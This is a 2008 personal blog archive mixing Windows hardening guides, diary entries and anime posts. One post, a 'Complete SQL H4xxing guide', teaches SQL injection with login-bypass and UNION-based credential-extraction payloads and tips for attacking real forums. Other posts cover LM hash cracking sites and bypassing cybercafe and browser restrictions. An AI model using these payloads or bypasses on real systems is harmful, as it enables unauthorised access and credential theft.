  大型企业网可能同时支持四到五个服务器传送e-mail,有的企业网还会出现几十个其他服务器监视SMTP端口的情况。这些主机中很可能有潜在的邮件 服务器的攻击点。因此要逐个中断网络服务器来进行审查。若一个程序(或程序中的逻辑单元)作为一个window文件服务器在运行但是又不具有文件服务器作 用的,关掉该文件的共享协议。

  6、首先保护重要资源

  若一个内网上连了千万台(例如30000台)机子,那么要期望保持每一台主机都处于锁定状态和补丁状态是非常不现实的。大型企业网的安全考虑一般都有 择优问题。这样,首先要对服务器做效益分析评估,然后对内网的每一台网络服务器进行检查、分类、修补和强化工作。必定找出重要的网络服务器(例如实时跟踪 客户的服务器)并对他们进行限制管理。这样就能迅速准确地确定企业最重要的资产,并做好在内网的定位和权限限制工作。

  7、建立可靠的无线访问

  审查网络,为实现无线访问建立基础。排除无意义的无线访问点,确保无线网络访问的强制性和可利用性,并提供安全的无线访问接口。将访问点置于边界防火墙之外,并允许用户通过VPN技术进行访问。

  8、建立安全过客访问

  对于过客不必给予其公开访问内网的权限。许多安全技术人员执行的“内部无Internet访问”的策略,使得员工给客户一些非法的访问权限,导致了内网实时跟踪的困难。因此,须在边界防火墙之外建立过客访问网络块。

  9、创建虚拟边界防护

  主机是被攻击的主要对象。与其努力使所有主机不遭攻击(这是不可能的),还不如在如何使攻击者无法通过受攻击的主机来攻击内网方面努力。于是必须解决 企业网络的使用和在企业经营范围建立虚拟边界防护这个问题。这样,如果一个市场用户的客户机被侵入了,攻击者也不会由此而进入到公司的R&D。因 此要实现公司R&D与市场之间的访问权限控制。大家都知道怎样建立互联网与内网之间的边界防火墙防护,现在也应该意识到建立网上不同商业用户群之 间的边界防护。

  10、可靠的安全决策

  网络用户也存在着安全隐患。有的用户或许对网络安全知识非常欠缺,例如不知道RADIUS和TACACS之间的不同,或不知道代理网关和分组过滤防火 墙之间的不同等等,但是他们作为公司的合作者,也是网络的使用者。因此企业网就要让这些用户也容易使用,这样才能引导他们自动的响应网络安全策略。

  另外,在技术上,采用安全交换机、重要数据的备份、使用代理网关、确保操作系统的安全、使用主机防护系统和入侵检测系统等等措施也不可缺少

教你找到电脑中隐藏的入侵的黑手


也许会遇到这样的情况:
  
  计算机突然死机,有时又自动重新启动,无端端的少了些文件,发现桌面刷新慢,没有运行什么大的程序,硬盘却在拼命的读写,系统也莫明其妙地对软驱进行搜索,杀毒软件和防火墙报警,发现系统的速度越来越慢,这时候你就要小心了.
  
  第一时间反应(养成一个好的习惯往碗可以减少所受的损失):用CTRL+ALT+DEL调出任务表,查看有什么程序在运行,如发现陌生的程序就要多加 注意,一般来说,凡是在任务管理器上的程序都不会对系统的基本运行照成负面影响(注意:这里说的是基本运行,先和大家说明白,关于这条我是在网络上关于这 个研究的结果),所以大家可以关闭一些可疑的程序来看看,发现一些不正常的情况恢复了正常,那么就可以初步确定是中了木马了,发现有多个名字相同的程序在 运行,而且可能会随时间的增加而增多,这也是一种可疑的现象也要特别注意,你这时是在连入Internet网或是局域网后才发现这些现象的话,不要怀疑, 动手查看一下吧!,(注:也有可能是其它一些病毒在作怪)
  
  1 先升级杀毒软件到最新,对系统进行全面的检查扫描.
  
  2 点击工具→文件夹选项→查看 把隐藏受保护的操作系统文件(推荐)和隐藏已知文件类型的扩展名 这两项前面的勾去掉,以方便查看.
  
  3 查看Windows目录下的WIN.INI文件中开头的几行:
   [WINDOWS]
   load=
   ren=
   这里放的是启动Windows自动执行的程序,可以看看对比对比一下.
  
  4 查看Windows目录下的SYSTEM.INI文件中的这几行:
   [386Enh]
   device=
   这里是放置系统本身和外加的驱动程序。外加的驱动程序一般都用全路径,如:
   device=c:\windows\system32\tianyangdemeng.exe(这里只是打个比方)
  
  5 查看开始菜单中的【程序】→【启动】。
   这里放的也是启动Windows自动执行的程序,如果有的话,它就放在C:\Windows\Start Menu\Programs\中,将它保存在较安全的地方后再删除,需要恢复时在拿出来恢复即可。
 6 在开始】→【运行】中输入"MSCONFIG"查看是否有可疑的启动项,你也许会问,前面不是说了吗?其实,这两种方法是不同的,你分别用这两个方法查看一下就会发现不同了,至于要说更深入点,说实在话,我也不知道.呵呵不要笑话,希望高手出来解答一下!
  
  7 查看注册表,在【开始】→【运行】中输入“REGEDIT”。
  
  先对注册表进行备份,才对注册查看。(一定要养成一个习惯,在修改木文件时,对自己没有把握的需要先进行备份)

  查看 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices和Run项,看看有没有可疑的程序.
  查看 HKEY_CLASSES_ROOT\EXEFILE\SHELL\OPEN\COMMAND,看看是否有.EXE文件关联的木马,正确值为"%1"%*
  查看 HKEY_CLASSES_ROOT\INFFILE\SHELL\OPEN\COMMAND,看看是否有.INF文件关联的木马,正确值为"SYSTEM ROOT%\SYSTEM32\NOTEPAD.EXE%1
  查看 HKEY_CLASSES_ROOT\TXTFILE\SHELL\OPEN\COMMAND,看看是否有.TXT文件关联的木马,正确值为%SYSTEM ROOT%\SYSTEM32\NOTEPAD.EXE%1
  启动CMD,输入NETSTAT -AN 查看有没有异常的端口.
  
  8 Windows中的执行文件.exe、.com、.dll ……它们都有可能是黑客放置的病毒或是黑客病毒的携带者。在系统正常的时候,把以上文件做一个备份,到需要的时候就可以写回去!
  
  9 在Windows目录下,看看有无一个名为Winstart.bat的文件。这个文件也是与Autoexec.bat类似的一个自动批处理文件,不过,它 只能在Windows工作而不能在DOS下使用。仔细看看有没有什么你不知道的驱动程序,把它记录下来,到百度查一下,一般这个自动批处理文件是不会被用 到的.(只能凭经验判断了)  10 查看c:\autoexec.bat与c:\config.sys,这两个文件里有一些系统所需的驱动程序。看看有没有什么可疑的驱动程序.
  
  11 右击【我的电脑】→事件查看器 查看安全日志,看看里面有没有可疑的内容.
  
  12 在CMD下输入NET USER 看看有没有可疑的用户,出现自己不曾设立的用户,马上用NET USER ABCD /DEL 把它删除(这里的ABCD是用户名,只要把它改成想要删除的用户就行了,也可去下个检查用户克隆器查看和其它一切能帮助到你的工具,有些黑客建立的用户用 一般方法是看不见的,大家就要注意了)

Tuesday, December 9, 2008

Port 53 vuln

from wired:source

Tuesday, December 2, 2008

Complete SQL H4xxing guide

***************
SQL Hacking
***************

The step-by-step article for learning how to SQL inject
Written by: Xenon

***************

Q. What is SQL?

A. I believe strongly in knowing what your doing is, rather than knowing everything about it. SQL is an abbreviation for the Standard Query Language.

As we look at the history of the internet, we see insecure HTTP ports, open to legal intrusion, then the secured ones, the sites with logins, and social sites that store information.
Where does all the information we fill in forms get stored? In a .txt file? I don't think so. All one would need to do is open it to retrieve all info. Besides, how could one extract particular data, and not the whole database?


Welcome to Databasing. A few common DB softwares are MySQL, MSSQL (Microsoft SQL - MS ACCESS), PostgreSQL, Oracle.
These softwares are manipulated and read by PHP coding. The PHP code sends a syntax to the DB to work on. The syntax remains more or less Standard, for all these softares, hence called SQL.

See this:



$info=mysql_result("SELECT * FROM information WHERE username='Alex' ");

It is highly recommended that one knows basic SQL before one hacks, so I have decided to include a few common queries in the article.

The SELECT query:

Like the one above, the SELECT retrieves data.

A table contains rows and columns.
Each column has a type of data, and each row different entries. Like so:

TABLE "INFORMATION"

username | password
admin root
alex user


So with the unless we give a parameter, the SELECT would retrieve the entire table.
Hence, the parameter.

WHERE:
WHERE username='Alex"
would extract:
username=Alex , password=user.

One or more parameters can be given like:
WHERE some1=this OR some2=this2

or

WHERE some1-this AND some2=this2

The OR checks for just one TRUE condition,
the AND for two TRUE conditions

LIKE: Seen in search engines.

SELECT * FROM information WHERE username LIKE 'al*'
* is the SQL Wildcard. This would extract the same row as above. (admin starts with 'ad', not 'al')



The UNION ALL:
Union the result of two queries, i.e. combine the result of two SELECT statements into one.
Note, that combining with UNION has a condition, both the SELECT statements should have the same number of columns, even if some columns are 'null'

SELECT * FROM information WHERE username='admin' UNION ALL SELECT * FROM information WHERE username='alex'

In case you wonder what * is, its our wildcard, to extract all columns. Since both the selects are from the same table in this case, * would mean the same number of columns in both the cases, hence allowing the UNION ALL..


This query would give both the rows as the result.


The AS:
AS allows you to define another name, like an "A.K.A", or an alias, for a particular column, table, or even the entire query.
See this:

SELECT username AS user, password AS pass FROM information WHERE username='alex' AS result_final

The comma enables you to select more than one column from our DB.
So now,
user=username
pass=password

and the whole data returned = result_final

Now, if the PHP refers to user, it will show the value of the original username.


NOTE:While SQL hacking, when a variable is given an alias, the programmer probably used that alias later, so your UNION ALL should use the same aliases to not give an error and show the data.


SQL Hacking:
Well the basic fundamental is to not hack our DB software, but the programmers vulnerable PHP that uses the DB.

All login forms add variables to the query so that the particular user is checked up.
This is done by GET or POST methods.

See this:

SELECT * FROM users WHERE username='".$username."'

Now we hack the SQL like this:

Put the value of $username in the form, as:
user' OR 'a'='a

So the query will now be processed like:

SELECT * FROM users WHERE username='user' OR 'a'='a'

For the password, do the same.

This will return all the usernames and password for character 'a' is always equal to itself.
We used 'a'='a to dodge the open/close inverted commas.

Sometimes, one could comment out the rest of the statement that PHP adds, by using SQL comments like:
/*
/**
//
--

Get to know your SQL Software, and google for its syntax.

Another SQL Hack would be:
Found in blogs.

See this:

SELECT topic AS content FROM info WHERE topic_number=1

Obviously, as the users click different topics, the value of topic_number changes. So topic_number is injectable. (Not always the case, SQL Hacks can be protected against by cautious programmers)

The obvious injection would be:

SELECT topic AS content, postedby AS poster, email FROM info WHERE topic_number=0 UNION ALL SELECT user AS content, password AS poster, null FROM users WHERE id=1

EXPLAINATION:

We keep same aliases for the columns, so the queries merge good.
Notice the null.

Its to keep the number of columns the same so that the union is successful. At the same time, email is unioned with null or nothing.

WHERE id=1 works on the presumption that the first user registered is always the admin, and his user id number is in the column named 'id'.



***************
TIPS
***************

1. Hunt down error messages that give you table names, column names, the aliases used, etc. THIS IS A NECESSITY!

2. Check out the target's site for PHP forms and variables that you give values to. Look at the URLs as you navigate.

3. Learning SQL helps!

4. You need practise and be familiar with the site. This is why the easiest sites to hack need a week at least, to be familiar with all the variables and column and table names.

5. Try personal sites, before attempting to hack IP.Boards and vBulletins.

6. For common scripts, download the script, hunt the vulnerabilities down by looking at the source,

7. Be patient. It takes time to hack databases, even for the simplest sites.

8. Don't get frustrated with large errors. Copy into a text editor, make font enjoyable, and read through the errors.

9. Never target one page on the site. See all scripts. Different errors give different table names.

10. Google for vulnerabilities in common software, syntax for a DB software, articles, study the site pattern, and be bold enough to guess column names, like 'id'.






---

Remember. 11% websites on the net are vulnerable to SQL injections.

11% is a huge figure, considering the number of websites out there.

---
source from 1,2

no tech h4x

just some information i found and i dump into my blog

here

list
or
same list

the site

Thursday, November 20, 2008

Upset

darn..I'd always made my life difficult
all the plans are set very pact..ad made m'self crazy

coz of some condition, I'm now stuck in middle and waiting to die..
..watta h***!!

If this situation can be solve by gaining help, that will be done.
that the only way I can think for..

if there is worse situation...either quit or being criticized...
..i didn't liked to be looked down, yes, i'm afraid to be.

...forget all about it, handle the test first, then think again, OK?!
focus on your ways first...other than that just leave it until you settle.

I know you can do it. if you cant who can do it for you?
and also there are friends along with you, mentally...they will understand you.

Sunday, October 19, 2008

Registry Tricks

in order to respect the author's creation,Click here.

Tuesday, October 14, 2008

OWASP Top 10 Web Security Vulns

click here for source

1.Unvalidated Input
2.Broken access Control
3.Broken account/session management
4.Cross-site scripting (XSS) flaws
5.Buffer Overflows
6.Injection flaws
7.Improper error handling
8.Insecure storage
9.Denial-of-service
10.Insecure configuration management

Tuesday, October 7, 2008

LM Hash Decoding Site

LM Hash search
Hash on IRC
other than that please |>0 |23534R(h u|253LF !

sample
you should make some time to understand some of the concept:

?
?


???
.aware Ezine

Sunday, September 28, 2008

option

just feeling lost in the career...is this the path i would like to go?
timeless, restless....how can I get a girlfriend?

my job doesn't care about my marital status..

only I'm being responsible to myself. The thing I concern is there any possibility to jump?

people go for money, for sure. And for sure, some of them concern about more stable life.

a balanced life, which could spend much time on their family.


just stuck in deadlock..

if quit then

experience= x month

else

new skill = null







Wednesday, August 6, 2008

LM Hash Decoder Server

http://neworder.box.sk/forum.php?did=multSecurity%20and%20Networking&thread=245506

Saturday, July 19, 2008

教你打造一道超级防御的电脑防火墙

网络安全中谈到个人上网时的安全,还是先把大家可能会遇到的问题归个类吧。我们遇到的入侵方式大概包括了以下几种:   
(1) 被他人盗取密码;   
(2) 系统被木马攻击;  
(3) 浏览网页时被恶意的java scrpit程序攻击;     
(4) QQ被攻击或泄漏信息;     
(5) 病毒感染;     
(6) 系统存在漏洞使他人攻击自己。     
(7) 黑客的恶意攻击。   

下面我们就来看看通过什么样的手段来更有效的防范攻击。
  1.察看本地共享资源
  运行CMD输入net share,如果看到有异常的共享,那么应该关闭。但是有时你关闭共享下次开机的时候又出现了,那么你应该考虑一下,你的机器是否已经被黑客所控制了,或者中了病毒。
  2.删除共享(每次输入一个)
  net share admin$ /delete
  net share c$ /delete
  net share d$ /delete(如果有e,f,……可以继续删除)
  3.删除ipc$空连接
  在运行内输入regedit,在注册表中找到 HKEY-LOCAL_MACHINESYSTEMCurrentControSetControlLSA 项里数值名称RestrictAnonymous的数值数据由0改为1。
  4.关闭自己的139端口,Ipc和RPC漏洞存在于此
  关闭139端口的方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WinS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关闭了139端口。
  5.防止Rpc漏洞
  打开管理工具——服务——找到RPC(Remote Procedure Call (RPC) Locator)服务——将故障恢复中的第一次失败,第二次失败,后续失败,都设置为不操作。
  Windwos XP SP2和Windows2000 Pro Sp4,均不存在该漏洞。
  6.445端口的关闭
  修改注册表,添加一个键值HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters在右面的窗口建立一个SMBDeviceEnabled 为REG_DWORD类型键值为 0这样就ok了。
  7.3389的关闭
  WindowsXP:我的电脑上点右键选属性-->远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。
  Win2000server 开始-->程序-->管理工具-->服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。(该方法在XP同样适用)
  使用Windows2000 Pro的朋友注意,网络上有很多文章说在Win2000pro 开始-->设置-->控制面板-->管理工具-->服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务,可以关闭3389,其实在2000pro 中根本不存在Terminal Services。     8.4899的防范   网络上有许多关于3389和4899的入侵方法。4899其实是一个远程控制软件所开启的服务端端口,由于这些控制软件功能强大,所以经常被黑客用来控制自己的肉鸡,而且这类软件一般不会被杀毒软件查杀,比后门还要安全。
  4899不象3389那样,是系统自带的服务。需要自己安装,而且需要将服务端上传到入侵的电脑并运行服务,才能达到控制的目的。
  所以只要你的电脑做了基本的安全配置,黑客是很难通过4899来控制你的。
  9、禁用服务
  打开控制面板,进入管理工具——服务,关闭以下服务:
  1.Alerter[通知选定的用户和计算机管理警报]
  2.ClipBook[启用“剪贴簿查看器”储存信息并与远程计算机共享]
  3.Distributed File System[将分散的文件共享合并成一个逻辑名称,共享出去,关闭后远程计算机无
  法访问共享
  4.Distributed Link Tracking Server[适用局域网分布式链接]
  5.Human Interface Devi
ce Access[启用对人体学接口设备(HID)的通用输入访问]
  6.IMAPI CD-Burning COM Service[管理 CD 录制]
  7.Indexing Service[提供本地或远程计算机上文件的索引内容和属性,泄露信息]
  8.Kerberos Key Distribution Center[授权协议登录网络]
  9.License Logging[监视IIS和SQL如果你没安装IIS和SQL的话就停止]
  10.Messenger[警报]
  11.NetMeeting Remote Desktop Sharing[netmeeting公司留下的客户信息收集]
  12.Network DDE[为在同一台计算机或不同计算机上运行的程序提供动态数据交换]
  13.Network DDE DSDM[管理动态数据交换 (DDE) 网络共享]
  14.Print Spooler[打印机服务,没有打印机就禁止吧]
  15.Remote Desktop Help& nbsp;Session Manager[管理并控制远程协助]
  16.Remote Registry[使远程计算机用户修改本地注册表]
  17.Routing and Remote Access[在局域网和广域往提供路由服务.黑客理由路由服务刺探注册信息]
  18.Server[支持此计算机通过网络的文件、打印、和命名管道共享]
  19.Special Administration Console Helper[允许管理员使用紧急管理服务远程访问命令行提示符]
  20.TCP/IPNetBIOS Helper[提供 TCP/IP 服务上的 NetBIOS 和网络上客户端的 NetBIOS 名称解析的支
  持而使用户能够共享文件 、打印和登录到网络]
  21.Telnet[允许远程用户登录到此计算机并运行程序]
  22.Terminal Services[允许用户以交互方式连接到远程计算机]
  23.Window s Image Acquisition (WIA)[照相服务,应用与数码摄象机]
  如果发现机器开启了一些很奇怪的服务,如r_server这样的服务,必须马上停止该服务,因为这完全有可能是黑客使用控制程序的服务端。    10、账号密码的安全原则   首先禁用guest帐号,将系统内建的administrator帐号改名(改的越复杂越好,最好改成中文的),而且要设置一个密码,最好是8位以上字母数字符号组合。
  如果你使用的是其他帐号,最好不要将其加进administrators,如果加入administrators组,一定也要设置一个足够安全的密码,同上如果你设置adminstrator的密码时,最好在安全模式下设置,因为经我研究发现,在系统中拥有最高权限的帐号,不是正常登陆下的adminitrator帐号,因为即使有了这个帐号,同样可以登陆安全模式,将sam文件删除,从而更改系统的administrator的密码!而在安全模式下设置的administrator则不会出现这种情况,因为不知道这个administrator密码是无法进入安全模式。权限达到最大这个是密码策略:用户可以根据自己的习惯设置密码,下面是我建议的设置。
  打开管理工具—本地安全设置—密码策略:
  1.密码必须符合复杂要求性.启用
  2.密码最小值.我设置的是8
  3.密码最长使用期限.我是默认设置42天
  4.密码最短使用期限0天
  5.强制密码历史 记住0个密码
  6.用可还原的加密来存储密码 禁用
  11、本地策略
  这个很重要,可以帮助我们发现那些心存叵测的人的一举一动,还可以帮助我们将来追查黑客。
  (虽然一般黑客都会在走时会清除他在你电脑中留下的痕迹,不过也有一些不小心的)
  打开管理工具,找到本地安全设置—本地策略—审核策略:
  1.审核策略更改 成功失败
  2.审核登陆事件 成功失败
  3.审核对象访问 失败
  4.审核跟踪过程 无审核
  5.审核目录服务访问 失败
  6.审核特权使用 失败
  7.审核系统事件 成功失败
  8.审核帐户登陆时间 成功失败
9.审核帐户管理 成功失败
  然后再到管理工具找到事件查看器:
  应用程序:右键>属性>设置日志大小上限,我设置了50mb,选择不覆盖事件。
  安全性:右键>属性>设置日志大小上限,我也是设置了50mb,选择不覆盖事件。
  系统:右键>属性>设置日志大小上限,我都是设置了50mb,选择不覆盖事件。    12、本地安全策略   打开管理工具,找到本地安全设置—本地策略—安全选项:
  1.交互式登陆.不需要按 Ctrl+Alt+Del 启用 [根据个人需要,? 但是我个人是不需要直接输入密码登
  陆的]。
  2.网络访问.不允许SAM帐户的匿名枚举 启用。
  3.网络访问.可匿名的共享 将后面的值删除。
  4.网络访问.可匿名的命名管道 将后面的值删除。
  5.网络访问.可远程访问的注册表路径 将后面的值删除。
  6.网络访问.可远程访问的注册表的子路径 将后面的值删除。
  7.网络访问.限制匿名访问命名管道和共享。
  8.帐户.(前面已经详细讲过拉 )。
  13、用户权限分配策略
  打开管理工具,找到本地安全设置—本地策略—用户权限分配:
  1.从网络访问计算机 里面一般默认有5个用户,除Admin外我们删除4个,当然,等下我们还得建一个属
  于自己的ID。
  2.从远程系统强制关机,Admin帐户也删除,一个都不留 。   
  3.拒绝从网络访问这台计算机 将ID删除。
  4.从网络访问此计算机,Admin也可删除,如果你不使用类似3389服务。
  5.通过远端强制关机。删掉。
  14、终端服务配置
  打开管理工具,终端服务配置:
  1.打开后,点连接,右键,属性,远程控制,点不允许远程控制。
  2.常规,加密级别,高,在使用标准Windows验证上点√!
  3.网卡,将最多连接数上设置为0。
  4.高级,将里面的权限也删除。
  再点服务器设置,在Active Desktop上,设置禁用,且限制每个使用一个会话。
  15、用户和组策略
  打开管理工具,计算机管理—本地用户和组—用户:
  删除Support_388945a0用户等等只留下你更改好名字的adminisrator权限。
  计算机管理—本地用户和组—组,组.我们就不分组了。     16、自己动手DIY在本地策略的安全选项   1)当登陆时间用完时自动注销用户(本地) 防止黑客密码渗透。
  2)登陆屏幕上不显示上次登陆名(远程)如果开放3389服务,别人登陆时,就不会残留有你登陆的用户
  名.让他去猜你的用户名去吧。
  3)对匿名连接的额外限制。
  4)禁止按 alt+crtl +del(没必要)。
  5)允许在未登陆前关机[防止远程关机/启动、强制关机/启动]。
  6)只有本地登陆用户才能访问cd-rom。
  7)只有本地登陆用户才能访问软驱。
  8)取消关机原因的提示。
  A、打开控制面板窗口,双击“电源选项”图标,在随后出现的电源属性窗口中,进入到“高级”标签
  页面;
  B、在该页面的“电源按钮”设置项处,将“在按下计算机电源按钮时”设置为“关机”,单击“确
  定”按钮,来退出设置框;
  C、以后需要关机时,可以直接按下电源按键,就能直接关闭计算机了。当然,我们也能启用休眠功能
  键,来实现快速关机和开机;
  D、要是系统中没有启用休眠模式的话,可以在控制面板窗口中,打开电源选项,进入到休眠标签页
  面,并在其中将“启用休眠”选项选中就可以了。
  9)禁止关机事件跟踪
  开始“Start ->”运行“ Run ->输入”gpedit.msc “,在出现的窗口的左边部分,选择 ”计算机配置“(Computer Configuration )-> ”管理模板“(Administrative Templates)-> ”系统“(System),在右边窗口双击“Shutdown Event Tracker” 在出现的对话框中选择“禁止(Disabled),点击然后“确定”(OK)保存后退出这样,你将看到类似于Windows 2000的关机窗口。
  17、常见端口的介绍            
  TCP
  21   FTP
  22   SSH
  23   TELNET
  25   TCP SMTP
  53   TCP DNS
  80   HTTP
  135  epmap
  138  [冲击波]
  139  smb
  445
  1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b
  1026 DCE/12345778-1234-abcd-ef00-0123456789ac
  1433 TCP SQL SERVER
  5631 TCP PCANYWHERE
  5632 UDP PCANYWHERE
  3389   Terminal Services
  4444[冲击波]   
  UDP
  67[冲击波]
  137 netbios-ns
  161 An SNMP Agent is running/ Default community names of the SNMP Agent
  关于UDP一般只有腾讯QQ会打开4000或者是8000端口或者8080,那么,我们只运 行本机使用4000这几个端口就行了。

Friday, June 13, 2008

Women Get In The Game



nowadays, the gaming marketing for women are slowly begin,
women involve in game developing, and future the may come out
games for women's tastes.

I wonder what sort of game will customized for women. Maybe like
BL game for women in Japan, haha~

Thursday, June 12, 2008

Journeyer

能夠有勇氣捨棄身邊的東西
而實現自己夢想的人在這個世界上少之又少

上個月住在VBG時
來了一位美國的旅人他已經離開家鄉

背包旅行了兩年
放下了工作

踏出了家門 面對不能預料的旅途及未來
前往他鄉探險毫無目的地流浪

在充滿未知路途上
面對種種障礙 他依然以一顆堅毅開放的心欣然看待

幾天後 他離開了此地也
沒有人知道他今後會往何處去

雖交談甚少
但依稀記得對白:

"離開這裡後,會去那裡?"
"不知道,還未打算"


邂逅是偶然 離開是必然的
如風一般 不留下任何痕跡

後記

他沒留下聯絡
這是浪人的習氣吧!

給與所有勇敢的旅人
祝福他們找到一個真正的家

Sunday, April 27, 2008

Nekkhamma

tomorrow will the the day i "giving up the world"
about my job hunting, will be after this.

the cough still remain...
thus, I wrote a full stop for now, for my ordinary live.

Saturday, April 26, 2008

typeteller


0196202461

Wednesday, April 23, 2008

googling result

想確認一下...這是乾天的部落格吧?!

googled something

Just found out something related around my circle.
here it is.

a blog that a people i knew (maybe not) who interest and learn investment.

文字與作品

如茶道,好的心情、好的時刻、好的茶具、好的茶葉才能泡出好茶
創作也一樣

好的作品能讓人回甘生津,止渴回韻,洽到好處
不像味精,味道過重,嘗久則膩,麻木味覺

說來,好久沒有詩意大發了

固執

或許人到了某個年齡,會不想改變
堅持自己那套未免不好,一旦雙方如此的話,變成僵局了,對大家沒有好處

我想,世界上的衝突及緊張關係都是這樣來的吧!
某個意義這種行為被稱為'穩定'

建立在不同的穩定上,所以就產生衝突和對歭
所以也製造了許多問題

人,總是不能永遠以宏觀的方式來看待事物
能做的,就是以某個意義的深遠來看待

可是,能讓自己沉寂下來的人不多
否則,那只是建立及延伸慾望

思痛

一旦懈怠便成習慣,就會對健康的行為產生抗拒
兩個學期沒有參與柔道練習,身子也差了

一定要想辦法讓自己振作才行,否則抗拒感會增強
不願改變,是因為需要將現在的習慣及形式打破吧!

打破慣性是需要勇氣、耐心及決心的
離開武人之道越來越遠,這樣一來沒有臉去見的人越來越多

人生一直都在抉擇中,不想做抉擇而停留在現有的狀況
保持狀況,沒有變化;通常就變成沒有進取

沒有突破的人生,對自己也沒有甚麼好的回憶吧!
就好像對於能解決漢堂遊戲,而對自己的實力有所肯定般吧!

在選擇中因為得此失彼而舉棋不定時
此時應該想想,跟自己要走的道路、原則相符與否?
走那條路,也不會遺憾?..即使失敗

人生,抉擇會影響你在關鍵時刻的結果
讓自己不模掕兩可,這樣才能破釜沉舟

接下來的人生,該去想想如何走如何走才能稱得上武人之道,充滿紀律、活力,不讓自己懈怠?

自身的執著

之前由於遲遲未決定短期出家,浪費了好一段時間
若早點出家,就可以找點回來找工

其中原因是生病,拖延了我的決定
第三個不安定因素是找人來租房子,否則房租又是一個負擔

說到找工,看到同學們一個兩個都開工了
難免有點擔心自己

一切的事情,是時候划上休止符.

Tuesday, April 22, 2008

想做和要做

要短期出家了

今天屋友說考試完畢打算游泳,去看戲
我只是聽了就算,因為我有非做不可的東西

也許我沒有直接說出來
不管甚麼理由都好,不說出來的確會讓人誤解

我只是想確保在那事情之前沒有干擾
對一些生命價值不一樣的人來說, 或許覺得沒必要

只是,我知道我的路要怎樣走
我知道人與人之間,始終需要離別

人生路上,基於種種的理由、種種的慾望,而選擇離別
理想、工作、事業、金錢、愛情、家庭....

要開始一樣事情的時候,一定要結束一些東西
當離開的時候,不要再依依不捨了

除非你感到迷惑...

Monday, April 21, 2008

Bots

recently watched some bot clips on youtube, I found interesting
especially a bot called 'Crabfu':



It's funny that Crabfu plays with cats.
Find out more bots in botjunkie

Sunday, April 20, 2008

Bypass right click lock on browsing

for IE6 & 7

1. Click Tools >Internet Options, then select security tab
2. Select Custom level
3. Disable Active Scripting at scripting section
4. Restart browser


for Firefox

1. Tools > Options
2. Click Web Features
3. Untick enable JavaScript

Somehow if there is no browser in computer, try this alternative

Saturday, April 19, 2008

Gundam 00

Gundam 00 第一季圓滿結束了.
覺得這個最後一集片段有意思, 所以跟大家分享:



中文
_____________________________________

瑪禮娜.伊斯麥爾:

你在讀這個的時候,我已不在這個世界...

通過武力來根除戰爭,在天人組織的只會戰斗的我,你告訴我了戰斗的意義.就如當時的高達一樣,我想了解:

為何世界會如此扭曲,這份扭曲來自何處?為何人們會有無意識的惡意,為何沒有人發現那份惡意?為何會有那使人生如此痛苦的存在?為何人們會支配別人,會被別人支配呢?為何要互相傷害,那人們又是為何這麼想要生存呢?

我在追尋。我想見到你就會找出答案。和我走的不同道路,追尋同樣目標的你,也許可以找到使人們互相理解的道路,找到這個答案。

我曾經和高達一起尋求這個答案
和高達一起...和高達一起...
_________________________________________
期待第二季會出現

Friday, April 18, 2008

意志の弱いの化け物

少しの達成を持っているとき、何人かの人々が自信がある上にいるでしょう。
彼らの信用は失敗に直面しているとき、容易に消え失せることであるかもしれません。

彼らの士気は非常に不安定です。彼らは、他のものとの比較をするのが好きです。
どんな努力と動作も与えないで、これは、「完全-主義」と呼ぶことができます。

今、私は気付いて、「完全-主義」は助けません。
あなたがこれをし続けるなら、虚弱者になることができます、そして、あなたであるなら、低能を持ってください。

結論は逃れるのではなく、現実に直面することです。
逃れるなら、あなたはこれから、再びそれに面しなければなりません…あなたがそれを解決するまで

Bypassing Cybercafe Management Software

Few days ago, I've accompany friend at cybercafe (CC), during the heavy rain outside.Instead of surfing, I'm puzzling about how the CC software works.

at least, I've come out with something:


click here for larger size

Still, there's many things I've have to deal with:

☐ bypass right click without registry
☐ bypass registry (right click lock)
☑ alternative to access win explorer file manager
☐ bypass installation restriction of some cc management s/w.
☐ deal with proxy on internal network like school labs, by finding ways to break the download limit.
☐ alternative to advanced access (control panel, command prompt)

Einst

"Vak Vafud" is word anglicized from Old Norse, means wakeful wanderer.
The purpose I create this blog is used to :

1. to post some Dynasty related informations
2. to share some of my information security issues
3. to tidy up my stuff, make this blog as an diary purpose, unlike my previous blog, informative purposes .

Obviously, I used to made this blog as different entity with my previous one, though


the source I'd used for blog naming >click here